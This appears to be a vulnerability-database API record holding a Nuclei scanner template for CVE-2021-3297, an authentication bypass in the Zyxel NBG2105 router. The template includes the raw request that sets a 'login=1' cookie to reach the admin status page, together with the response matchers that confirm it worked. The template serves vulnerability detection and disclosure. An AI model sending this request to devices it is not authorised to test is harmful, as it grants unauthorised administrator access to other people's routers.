{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-3297/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-3297/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-3297/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-3297/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-3297/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-3297"},"sightings":{"href":"/api/v1/sightings/cve-2021-3297"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-3297.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2021-3297\n\ninfo:\n  name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass\n  author: gy741\n  severity: high\n  description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device.\n  remediation: |\n    Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability.\n  reference:\n    - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass\n    - https://www.zyxel.com/us/en/support/security_advisories.shtml\n    - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-3297\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.8\n    cve-id: CVE-2021-3297\n    cwe-id: CWE-287\n    epss-score: 0.20514\n    epss-percentile: 0.97426\n    cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\\(aagu.2\\)c0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: zyxel\n    product: nbg2105_firmware\n  tags: cve,cve2021,zyxel,auth-bypass,router,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /status.htm HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: language=en; login=1\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"Running Time\"\n          - \"Firmware Version\"\n          - \"Firmware Build Time\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b9fb8732a4ea4ffe98bd5d2a0a59fcd067566846363130f6732a1588029b609f0221008f5c783c6ff3c63328b7f35e5566493543234483f5a32158357071a9ae464b35:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2021-3297"}